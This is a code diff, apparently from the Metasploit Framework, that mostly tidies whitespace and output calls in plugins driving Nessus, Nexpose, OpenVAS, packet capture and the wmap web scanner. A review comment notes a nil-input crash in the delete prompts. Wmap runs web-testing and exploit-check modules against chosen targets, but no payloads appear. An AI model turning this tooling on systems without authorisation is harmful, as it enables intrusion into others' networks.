print_status("Usage: ") print_status(" nessus_scan_new ") @@ -1013,11 +1004,11 @@ module Msf print_status("use nessus_policy_list to list all available policies") return end - + if ! nessus_verify_token return end - + case args.length when 3 pid = args[0].to_i 
@@ -1029,23 +1020,23 @@ module Msf print_status(" use nessus_policy_list to list all available policies") return end - + if check_policy(pid) print_error("That policy does not exist.") return end - + print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning #{tgts}") - + scan = @n.scan_new(pid, name, tgts) - + if scan print_status("Scan started. uid is #{scan}") end end - + def cmd_nessus_scan_pause(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_pause ") @@ -1055,11 +1046,11 @@ module Msf print_status("use nessus_scan_status to list all available scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 sid = args[0] @@ -1069,14 +1060,14 @@ module Msf print_status(" use nessus_scan_status to list all available scans") return end - + pause = @n.scan_pause(sid) - + print_status("#{sid} has been paused") end - + def cmd_nessus_scan_resume(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_resume ") @@ -1086,11 +1077,11 @@ module Msf print_status("use nessus_scan_status to list all available scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 sid = args[0] @@ -1100,14 +1091,14 @@ module Msf print_status(" use nessus_scan_status to list all available scans") return end - + resume = @n.scan_resume(sid) - + print_status("#{sid} has been resumed") end - + def cmd_nessus_report_hosts(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_hosts ") @@ -1117,11 +1108,11 @@ module Msf print_status("use nessus_report_list to list all available scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 rid = args[0] @@ -1131,10 +1122,9 @@ module Msf print_status(" use nessus_report_list to list all available reports") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Hostname', 'Severity', 'Sev 0', 
@@ -1149,14 +1139,14 @@ module Msf tbl << [ host['hostname'], host['severity'], host['sev0'], host['sev1'], host['sev2'], host['sev3'], host['current'], host['total'] ] } print_good("Report Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("You can:") print_status(" Get information from a particular host: nessus_report_host_ports ") end - + def cmd_nessus_report_host_ports(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_host_ports ") @@ -1165,11 +1155,11 @@ module Msf print_status("Returns all the ports associated with a host and details about their vulnerabilities") print_status("use nessus_report_hosts to list all available hosts for a report") end - + if ! nessus_verify_token return end - + case args.length when 2 host = args[0] @@ -1180,10 +1170,9 @@ module Msf print_status(" use nessus_report_list to list all available reports") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Port', 'Protocol', 'Severity', @@ -1198,14 +1187,14 @@ module Msf tbl << [ port['portnum'], port['protocol'], port['severity'], port['svcname'], port['sev0'], port['sev1'], port['sev2'], port['sev3'] ] } print_good("Host Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("You can:") print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail ") end - + def cmd_nessus_report_host_detail(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_host_detail ") @@ -1215,11 +1204,11 @@ module Msf print_status("use nessus_report_host_ports to list all available ports for a host") return end - + if ! nessus_verify_token return end - + case args.length when 4 host = args[0] 
@@ -1232,10 +1221,9 @@ module Msf print_status(" use nessus_report_host_ports to list all available ports") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Port', 'Severity', 'PluginID', @@ -1248,15 +1236,25 @@ module Msf ]) details=@n.report_host_port_details(rid, host, port, prot) details.each {|detail| - tbl << [ detail['port'], detail['severity'], detail['pluginID'], detail['pluginName'], detail['cvss_base_score'] || 'none', detail['exploit_available'] || '.', detail['cve'] || '.', detail['risk_factor'] || '.', detail['cvss_vector'] || '.' ] + tbl << [ + detail['port'], + detail['severity'], + detail['pluginID'], + detail['pluginName'], + detail['cvss_base_score'] || 'none', + detail['exploit_available'] || '.', + detail['cve'] || '.', + detail['risk_factor'] || '.', + detail['cvss_vector'] || '.' + ] } print_good("Port Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_scan_pause_all(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_pause_all") @@ -1266,18 +1264,18 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + pause = @n.scan_pause_all - + print_status("All scans have been paused") end - + def cmd_nessus_scan_stop(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_stop ") @@ -1287,11 +1285,11 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 sid = args[0] @@ -1301,14 +1299,14 @@ module Msf print_status(" use nessus_scan_status to list all available scans") return end - + pause = @n.scan_stop(sid) - + print_status("#{sid} has been stopped") end - + def cmd_nessus_scan_stop_all(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_stop_all") 
@@ -1318,18 +1316,18 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + pause = @n.scan_stop_all - + print_status("All scans have been stopped") end - + def cmd_nessus_scan_resume_all(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_resume_all") @@ -1339,18 +1337,18 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + pause = @n.scan_resume_all - + print_status("All scans have been resumed") end - + def cmd_nessus_user_add(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_add ") @@ -1360,16 +1358,16 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 2 user = args[0] @@ -1380,7 +1378,7 @@ module Msf print_status(" Only adds non admin users") return end - + u = @n.users_list u.each { |stuff| if stuff['name'] == user @@ -1396,9 +1394,9 @@ module Msf print_error("#{user} was not added") end end - + def cmd_nessus_user_del(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_del ") @@ -1408,16 +1406,16 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 1 user = args[0] @@ -1427,7 +1425,7 @@ module Msf print_status(" Only dels non admin users") return end - + del = @n.user_del(user) status = del.root.elements['status'].text if status == "OK" @@ -1436,9 +1434,9 @@ module Msf print_error("#{user} was not deleted") end end - + def cmd_nessus_user_passwd(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_passwd ") 
@@ -1448,16 +1446,16 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 2 user = args[0] @@ -1468,7 +1466,7 @@ module Msf print_status(" User list from nessus_user_list") return end - + pass = @n.user_pass(user,pass) status = pass.root.elements['status'].text if status == "OK" @@ -1477,9 +1475,9 @@ module Msf print_error("#{user}'s password has not been changed") end end - + def cmd_nessus_admin(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_admin") @@ -1489,20 +1487,20 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") else print_good("Your Nessus user is an admin") end end - + def cmd_nessus_plugin_family(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_family ") @@ -1512,11 +1510,11 @@ module Msf print_status("use nessus_plugin_list to list all plugins") return end - + if ! nessus_verify_token return end - + case args.length when 1 fam = args[0] @@ -1526,27 +1524,26 @@ module Msf print_status(" list all plugins from a Family from nessus_plugin_list") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Plugin ID', 'Plugin Name', 'Plugin File Name' ]) - + family = @n.plugin_family(fam) - + family.each {|plugin| tbl << [ plugin['id'], plugin['name'], plugin['filename'] ] } print_good("#{fam} Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_policy_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_policy_list") 
@@ -1555,14 +1552,13 @@ module Msf print_status("Lists all policies on the server") return end - + if ! nessus_verify_token return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'ID', 'Name', 'Comments' @@ -1572,12 +1568,12 @@ module Msf tbl << [ policy['id'], policy['name'], policy['comments'] ] } print_good("Nessus Policy List") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_policy_del(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_policy_del ") @@ -1587,16 +1583,16 @@ module Msf print_status("use nessus_policy_list to list all policies") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 1 pid = args[0] @@ -1606,9 +1602,8 @@ module Msf print_status(" nessus_policy_list to find the id.") return end - + print_error("Are you sure you want to delete #{pid} ?") - $stdout.flush answer = gets answer.chomp! if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes" @@ -1623,9 +1618,9 @@ module Msf print_error("wow that was close, damn we asked") end end - + def cmd_nessus_plugin_details(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_details ") @@ -1635,11 +1630,11 @@ module Msf print_status("use nessus_plugin_list to list all plugins") return end - + if ! nessus_verify_token return end - + case args.length when 1 pname = args[0] @@ -1649,14 +1644,13 @@ module Msf print_status(" nessus_plugin_list and then nessus_plugin_family to find the plugin file name.") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ '', '' ]) - + entry = @n.plugin_detail(pname) print_good("Plugin Details for #{entry['name']}") tbl << [ "Plugin ID", entry['id'] ] 
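Review bot: In the cmd_nessus_policy_del confirmation, `answer = gets` followed by `answer.chomp!` raises NoMethodError when `gets` returns nil, which happens at EOF when the console is driven from a pipe or a resource script, so the delete prompt aborts the command with a stack trace instead of a clean refusal. `answer = gets.to_s.chomp` keeps the existing comparisons and treats EOF as "no". The identical pattern appears in cmd_nessus_report_del further down; the enclosing method here begins outside this hunk.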
@@ -1673,12 +1667,12 @@ module Msf tbl << [ "Solution", entry['solution'] ] tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ] tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ] - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_report_del(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_del ") @@ -1688,16 +1682,16 @@ module Msf print_status("use nessus_report_list to list all reports") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 1 rid = args[0] @@ -1707,9 +1701,8 @@ module Msf print_status(" nessus_report_list to find the id.") return end - + print_error("Are you sure you want to delete #{rid} ?") - $stdout.flush answer = gets answer.chomp! if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes") @@ -1723,12 +1716,12 @@ module Msf else print_error("wow that was close, damn we asked") end - - + + end - + def cmd_nessus_server_prefs(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_server_prefs") @@ -1737,19 +1730,18 @@ module Msf print_status("Returns a long list of server prefs.") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Name', 'Value' ]) @@ -1758,13 +1750,13 @@ module Msf tbl << [ pref['name'], pref['value'] ] } print_good("Nessus Server Pref List") - puts "\n" - puts tbl.to_s + "\n" - + print_good "\n" + print_good tbl.to_s + "\n" + end - + def cmd_nessus_plugin_prefs(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_prefs") 
@@ -1773,19 +1765,18 @@ module Msf print_status("Returns a long list of plugin prefs.") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Name', 'Value', 'Type' @@ -1795,11 +1786,11 @@ module Msf tbl << [ pref['prefname'], pref['prefvalues'], pref['preftype'] ] } print_good("Nessus Plugins Pref List") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end end - + def initialize(framework, opts) super diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index ced99dc51a..d53d01740d 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb 
@@ -566,44 +566,44 @@ class Plugin::Nexpose < Msf::Plugin end end - # - # Nexpose vuln lookup - # - def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil) - doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef| - - title = vulndef.attributes['title'] - pciSeverity = vulndef.attributes['pciSeverity'] - cvss_score = vulndef.attributes['cvssScore'] - cvss_vector = vulndef.attributes['cvssVector'] - - vulndef.elements['references'].elements.each('reference') do |ref| - if ref.attributes['source'] == 'BID' - refs[ 'BID-' + ref.text ] = true - elsif ref.attributes['source'] == 'CVE' - # ref.text is CVE-$ID - refs[ ref.text ] = true - elsif ref.attributes['source'] == 'MS' - refs[ 'MSB-MS-' + ref.text ] = true - end - end - - refs[ 'NEXPOSE-' + vid.downcase ] = true - - vuln = framework.db.find_or_create_vuln( + # + # Nexpose vuln lookup + # + def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil) + doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef| + + title = vulndef.attributes['title'] + pciSeverity = vulndef.attributes['pciSeverity'] + cvss_score = vulndef.attributes['cvssScore'] + cvss_vector = vulndef.attributes['cvssVector'] + + vulndef.elements['references'].elements.each('reference') do |ref| + if ref.attributes['source'] == 'BID' + refs[ 'BID-' + ref.text ] = true + elsif ref.attributes['source'] == 'CVE' + # ref.text is CVE-$ID + refs[ ref.text ] = true + elsif ref.attributes['source'] == 'MS' + refs[ 'MSB-MS-' + ref.text ] = true + end + end + + refs[ 'NEXPOSE-' + vid.downcase ] = true + + vuln = framework.db.find_or_create_vuln( :host => host, :service => serv, :name => 'NEXPOSE-' + vid.downcase, :data => title) - - rids = [] - refs.keys.each do |r| - rids << framework.db.find_or_create_ref(:name => r) - end - - vuln.refs << (rids - vuln.refs) - end - end + + rids = [] + refs.keys.each do |r| + rids << framework.db.find_or_create_ref(:name => r) + end + 
+ vuln.refs << (rids - vuln.refs) + end + end end diff --git a/plugins/openvas.rb b/plugins/openvas.rb index f856006962..46722a58df 100644 --- a/plugins/openvas.rb +++ b/plugins/openvas.rb @@ -3,7 +3,10 @@ # This plugin provides integration with OpenVAS. Written by kost and # averagesecurityguy. # -# Distributed under MIT license: +# $Id$ +# $Revision$ +# +# Distributed under MIT license: # http://www.opensource.org/licenses/mit-license.php # @@ -34,7 +37,7 @@ class Plugin::OpenVAS < Msf::Plugin 'openvas_task_pause' => "Pause task by ID", 'openvas_task_resume' => "Resume task by ID", 'openvas_task_resume_or_start' => "Resume task or start task by ID", - + 'openvas_target_create' => "Create target (name, hosts, comment)", 'openvas_target_delete' => "Delete target by ID", 'openvas_target_list' => "Display list of targets", @@ -43,7 +46,7 @@ class Plugin::OpenVAS < Msf::Plugin 'openvas_format_list' => "Display list of available report formats", - 'openvas_report_list' => "Display a list of available report formats", + 'openvas_report_list' => "Display a list of available report formats", 'openvas_report_delete' => "Delete a report specified by ID", 'openvas_report_download' => "Save a report to disk", 'openvas_report_import' => "Import report specified by ID into framework", @@ -172,7 +175,7 @@ class Plugin::OpenVAS < Msf::Plugin # Make sure the correct number of arguments are present. if args?(args, 4, 5) - + user, pass, host, port, sslv = args # SSL warning. User is required to confirm. @@ -199,10 +202,10 @@ class Plugin::OpenVAS < Msf::Plugin else print_status("Usage:") - print_status("openvas_connect username password host port ") + print_status("openvas_connect username password host port ") end end - + # Disconnect from an OpenVAS manager def cmd_openvas_disconnect() return unless openvas? 
@@ -216,7 +219,7 @@ class Plugin::OpenVAS < Msf::Plugin #-------------------------- def cmd_openvas_target_create(*args) return unless openvas? - + if args?(args, 3) begin resp = @ov.target_create(args[0], args[1], args[2]) @@ -255,13 +258,14 @@ class Plugin::OpenVAS < Msf::Plugin 'Columns' => ["ID", "Name", "Hosts", "Max Hosts", "In Use", "Comment"]) id = 0 @ov.target_get_all().each do |target| - tbl << [ id, target["name"], target["hosts"], target["max_hosts"], - target["in_use"], target["comment"] ] + tbl << [ id, target["name"], target["hosts"], target["max_hosts"], + target["in_use"], target["comment"] ] id += 1 end print_good("OpenVAS list of targets") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -324,8 +328,9 @@ class Plugin::OpenVAS < Msf::Plugin id += 1 end print_good("OpenVAS list of tasks") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -415,15 +420,16 @@ class Plugin::OpenVAS < Msf::Plugin begin tbl = Rex::Ui::Text::Table.new( 'Columns' => [ "ID", "Name" ]) - + id = 0 @ov.configs.each do |config| tbl << [ id, config["name"] ] id += 1 end print_good("OpenVAS list of configs") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -444,8 +450,9 @@ class Plugin::OpenVAS < Msf::Plugin id += 1 end print_good("OpenVAS list of report formats") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end @@ -466,8 +473,9 @@ class Plugin::OpenVAS < Msf::Plugin id += 1 end print_good("OpenVAS list of reports") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + print_good "\n" rescue OpenVASOMP::OMPError => e print_error(e.to_s) end 
@@ -508,7 +516,7 @@ class Plugin::OpenVAS < Msf::Plugin print_status("Usage: openvas_report_download ") end end - + def cmd_openvas_report_import(*args) return unless openvas? @@ -523,7 +531,7 @@ class Plugin::OpenVAS < Msf::Plugin else print_status("Usage: openvas_report_import ") print_status("Only the NBE format is supported for importing.") - end + end end end # End OpenVAS class diff --git a/plugins/pcap_log.rb b/plugins/pcap_log.rb index 496e75abad..c7bf8e368e 100644 --- a/plugins/pcap_log.rb +++ b/plugins/pcap_log.rb @@ -37,7 +37,7 @@ class Plugin::PcapLog < Msf::Plugin "pcap_iface" => "Set/Get an interface to capture from", "pcap_start" => "Start a capture", "pcap_stop" => "Stop a running capture", - + "pcap_show_config" => "Show the current PcapLog configuration" } end @@ -59,7 +59,7 @@ class Plugin::PcapLog < Msf::Plugin def cmd_pcap_iface(*args) @iface = args[0] || @iface - print_line "#{self.name} Interface: #{@iface}" + print_line "#{self.name} Interface: #{@iface}" end def cmd_pcap_start(*args) @@ -94,7 +94,7 @@ class Plugin::PcapLog < Msf::Plugin print_line "Capture Stats: #{@pcap.stats.inspect}" @pcap = nil @capture_file.close if @capture_file.respond_to? :close - @capture_thread.kill + @capture_thread.kill @capture_thread = nil else print_error "No capture running." @@ -124,7 +124,7 @@ class Plugin::PcapLog < Msf::Plugin return [false, msg] end - # Check directory suitability. + # Check directory suitability. unless File.directory? @dir msg = "Invalid pcap directory specified: '#{@dir}'" return [false, msg] @@ -170,7 +170,7 @@ class Plugin::PcapLog < Msf::Plugin end end - + def initialize(framework, opts) super add_console_dispatcher(PcapLogDispatcher) diff --git a/plugins/wmap.rb b/plugins/wmap.rb index 12b4a1f796..010e2140f7 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -12,9 +12,9 @@ module Msf class Plugin::Wmap < Msf::Plugin class WmapCommandDispatcher - + attr_accessor :targets - + include Msf::Ui::Console::CommandDispatcher def name 
@@ -37,12 +37,12 @@ class Plugin::Wmap < Msf::Plugin while (arg = args.shift) case arg - when '-c' - self.targets = {} + when '-c' + self.targets = {} when '-l' view_targets return - when '-t' + when '-t' process_urls(args.shift) when '-h' print_status("Usage: wmap_targets [options]") @@ -50,7 +50,7 @@ class Plugin::Wmap < Msf::Plugin print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ") print_line("\t-c Clean target sites list") print_line("\t-l List all target sites") - + print_line("") return else @@ -59,7 +59,7 @@ class Plugin::Wmap < Msf::Plugin end end end - + def cmd_wmap_sites(*args) args.push("-h") if args.length == 0 @@ -68,10 +68,10 @@ class Plugin::Wmap < Msf::Plugin when '-a' s = add_web_site(args.shift) if s - print_status("Site created.") + print_status("Site created.") else print_error("Unable to create site") - end + end when '-l' view_sites return @@ -79,7 +79,7 @@ class Plugin::Wmap < Msf::Plugin u = args.shift l = args.shift s = args.shift - + if l == nil or l.empty? l = 200 s = true @@ -87,16 +87,16 @@ class Plugin::Wmap < Msf::Plugin l = l.to_i s = false end - + view_site_tree(u,l,s) - return + return when '-h' print_status("Usage: wmap_sites [options]") print_line("\t-h Display this help text") print_line("\t-a [url] Add site (vhost,url)") print_line("\t-l List all available sites") print_line("\t-s [urls] (level) Display site structure (vhost,url)") - + print_line("") return else @@ -105,7 +105,7 @@ class Plugin::Wmap < Msf::Plugin end end end - + def cmd_wmap_run(*args) # Run exploit check wmap_check = true @@ -113,7 +113,7 @@ class Plugin::Wmap < Msf::Plugin wmap_runexpl = false # Exit wmap if session is created wmap_exitifsess = true - + # Formating sizeline = 60 
@@ -122,38 +122,38 @@ class Plugin::Wmap < Msf::Plugin # Exclude files can be modified by setting datastore['WMAP_EXCLUDE'] wmap_exclude_files = '.*\.(gif|jpg|png*)$' - + run_wmap_ssl = true run_wmap_server = true run_wmap_dir_file = true run_wmap_query = true run_wmap_unique_query = true run_wmap_generic = true - + # If module supports datastore['VERBOSE'] moduleverbose = false - + showprogress = false - + if not run_wmap_ssl print_status("Loading of wmap ssl modules disabled.") end if not run_wmap_server print_status("Loading of wmap server modules disabled.") - end - if not run_wmap_dir_file + end + if not run_wmap_dir_file print_status("Loading of wmap dir and file modules disabled.") end if not run_wmap_query print_status("Loading of wmap query modules disabled.") - end - if not run_wmap_unique_query + end + if not run_wmap_unique_query print_status("Loading of wmap unique query modules disabled.") - end - if not run_wmap_generic + end + if not run_wmap_generic print_status("Loading of wmap generic modules disabled.") - end - + end + stamp = Time.now.to_f mode = 0 @@ -203,7 +203,7 @@ class Plugin::Wmap < Msf::Plugin print_status("Using module #{mname}.") end using_m = true - + when '-h' print_status("Usage: wmap_run [options]") print_line("\t-h Display this help text") 
@@ -220,30 +220,30 @@ class Plugin::Wmap < Msf::Plugin print_error("Targets have not been selected.") return end - - if self.targets.keys.length == 0 + + if self.targets.keys.length == 0 print_error("Targets have not been selected.") return end - + self.targets.each_with_index do |t, idx| selected_host = t[1][:host] selected_port = t[1][:port] selected_ssl = t[1][:ssl] selected_vhost = t[1][:vhost] - + print_status ("Testing target:") print_status ("\tSite: #{selected_vhost} (#{selected_host})") print_status ("\tPort: #{selected_port} SSL: #{selected_ssl}") - puts '='* sizeline + print_status '='* sizeline print_status("Testing started. #{(Time.now )}") - - + + if not selected_ssl run_wmap_ssl = false #print_status ("Target is not SSL. SSL modules disabled.") end - + # WMAP_DIR, WMAP_FILE matches = {} @@ -252,7 +252,7 @@ class Plugin::Wmap < Msf::Plugin # WMAP_QUERY matches2 = {} - + # WMAP_SSL matches3 = {} @@ -279,7 +279,7 @@ class Plugin::Wmap < Msf::Plugin if penabled #if ( not using_p or eprofile.include? n.split('/').last ) or (using_m and n.match(mname)) - if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p) + if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p) # # First run the WMAP_SERVER plugins # @@ -307,7 +307,7 @@ class Plugin::Wmap < Msf::Plugin when :WMAP_SSL if run_wmap_ssl matches3[[selected_host,selected_port,selected_ssl,selected_vhost,mtype[1]+'/'+n]]=true - end + end else # Black Hole end 
@@ -321,14 +321,14 @@ class Plugin::Wmap < Msf::Plugin # Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server. # :WMAP_SSL # - - puts "\n=[ SSL testing ]=" - puts "=" * sizeline - + + print_status "\n=[ SSL testing ]=" + print_status "=" * sizeline + if not selected_ssl print_status ("Target is not SSL. SSL modules disabled.") end - + idx = 0 matches3.each_key do |xref| idx += 1 @@ -377,7 +377,7 @@ class Plugin::Wmap < Msf::Plugin mod.datastore['VHOST'] = xref[3].to_s mod.datastore['VERBOSE'] = moduleverbose mod.datastore['ShowProgress'] = showprogress - + # # Run the plugins that only need to be # launched once. @@ -386,7 +386,7 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type if wtype == :WMAP_SSL - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -490,14 +490,14 @@ class Plugin::Wmap < Msf::Plugin end end - + # # Handle modules that need to be run before all tests, once usually again the web server. # :WMAP_SERVER # - puts "\n=[ Web Server testing ]=" - puts "=" * sizeline - + print_status "\n=[ Web Server testing ]=" + print_status "=" * sizeline + idx = 0 matches1.each_key do |xref| idx += 1 @@ -555,7 +555,7 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type if wtype == :WMAP_SERVER - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -663,9 +663,9 @@ class Plugin::Wmap < Msf::Plugin # Handle modules to be run at every path/file # WMAP_DIR, WMAP_FILE # - puts "\n=[ File/Dir testing ]=" - puts "=" * sizeline - + print_status "\n=[ File/Dir testing ]=" + print_status "=" * sizeline + idx = 0 matches.each_key do |xref| idx += 1 
@@ -716,13 +716,13 @@ class Plugin::Wmap < Msf::Plugin h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) - - puts "Module #{xref[4]}:" - + + print_status "Module #{xref[4]}:" + test_tree = load_tree(w) test_tree.each do |node| - - p = node.current_path + + p = node.current_path testpath = Pathname.new(p) strpath = testpath.cleanpath(false).to_s @@ -830,9 +830,9 @@ class Plugin::Wmap < Msf::Plugin # Run modules for each request to play with URI with UNIQUE query parameters. # WMAP_UNIQUE_QUERY # - puts "\n=[ Unique Query testing ]=" - puts "=" * sizeline - + print_status "\n=[ Unique Query testing ]=" + print_status "=" * sizeline + idx = 0 matches5.each_key do |xref| idx += 1 
@@ -881,50 +881,50 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type utest_query = {} - + h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) - + w.web_forms.each do |form| # # Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn' # - + datastr = "" - typestr = "" - + typestr = "" + temparr = [] - - #puts "---------" - #puts form.params - #puts "+++++++++" - + + #print_status "---------" + #print_status form.params + #print_status "+++++++++" + form.params.each do |p| pn, pv, pt = p temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s) end - - datastr = temparr.join("&") if (temparr and not temparr.empty?) - + + datastr = temparr.join("&") if (temparr and not temparr.empty?) + if (utest_query.has_key?(mod.signature(form.path,datastr)) == false) - + mod.datastore['METHOD'] = form.method.upcase mod.datastore['PATH'] = form.path mod.datastore['QUERY'] = form.query if form.method.upcase == 'GET' mod.datastore['QUERY'] = datastr - mod.datastore['DATA'] = "" - end + mod.datastore['DATA'] = "" + end mod.datastore['DATA'] = datastr if form.method.upcase == 'POST' mod.datastore['TYPES'] = typestr - + # # TODO: Add headers, etc. # if wtype == :WMAP_UNIQUE_QUERY - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -953,7 +953,7 @@ class Plugin::Wmap < Msf::Plugin # Unique query tested, actually the value does not matter # #print_status("sig: #{mod.signature(form.path,varnarr.join(','))}") - + utest_query[mod.signature(form.path,datastr)]=1 else #print_status("Already tested") 
@@ -972,9 +972,9 @@ class Plugin::Wmap < Msf::Plugin # and will make this shotgun implementation much simple. # WMAP_QUERY # - puts "\n=[ Query testing ]=" - puts "=" * sizeline - + print_status "\n=[ Query testing ]=" + print_status "=" * sizeline + idx = 0 matches2.each_key do |xref| idx += 1 @@ -1026,37 +1026,37 @@ class Plugin::Wmap < Msf::Plugin h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) - + w.web_forms.each do |req| - + datastr = "" - typestr = "" - + typestr = "" + temparr = [] - + req.params.each do |p| pn, pv, pt = p temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s) end - - datastr = temparr.join("&") if (temparr and not temparr.empty?) - + + datastr = temparr.join("&") if (temparr and not temparr.empty?) + mod.datastore['METHOD'] = req.method.upcase mod.datastore['PATH'] = req.path if req.method.upcase == 'GET' mod.datastore['QUERY'] = datastr - mod.datastore['DATA'] = "" - end + mod.datastore['DATA'] = "" + end mod.datastore['DATA'] = datastr if req.method.upcase == 'POST' 